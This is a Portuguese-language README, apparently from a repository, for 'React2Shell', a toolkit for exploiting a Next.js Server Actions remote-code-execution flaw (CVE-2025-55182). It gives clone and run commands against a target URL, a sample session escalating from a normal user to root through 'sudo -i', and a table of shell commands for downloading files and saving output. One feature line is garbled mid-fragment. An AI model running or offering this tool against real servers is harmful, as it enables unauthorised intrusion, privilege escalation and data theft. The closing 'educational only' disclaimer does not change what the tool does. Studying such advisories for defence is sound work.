
Kit de Ferramentas de Exploração Avançado para Server Actions do Next.js (CVE-2025-55182)
Kit avançado de exploração para Server Actions do Next.js (CVE-2025-55182).
React2Shell é um wrapper de shell interativo e poderoso, projetado para explorar a vulnerabilidade React2Shell. Ele vai além do simples RCE, fornecendo histórico de comandos, capacidades de transferência de arquivos e estratégias automatizadas de escalonamento de privilégios.
base64 | sudo -i) para contornar restrições do shell e escalar para root instantaneamente..download <remote> [local]: Download de arquivos confiável e seguro para binários usando codificação base64..save: Salva a saída do comando em arquivos de evidência locais.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
Execute com detecção de estratégia de persistência de root verificada:
python3 react2shell.py -u https://target.com/
Uma vez dentro do shell:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
APENAS PARA FINS EDUCACIONAIS. Esta ferramenta destina-se exclusivamente a pesquisa de segurança e testes autorizados. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta. Não analise nem explore alvos para os quais você não tenha permissão explícita para testar.
Desenvolvida para testes de penetração éticos e operações de red team.
| Comando | Descrição |
|---|
.root | Alterna o Modo Root (envolve os comandos em sudo -i) |
.download <file> | Baixa um arquivo do servidor remoto |
.save | Salva a saída do último comando em um arquivo |
.exit | Sai do shell |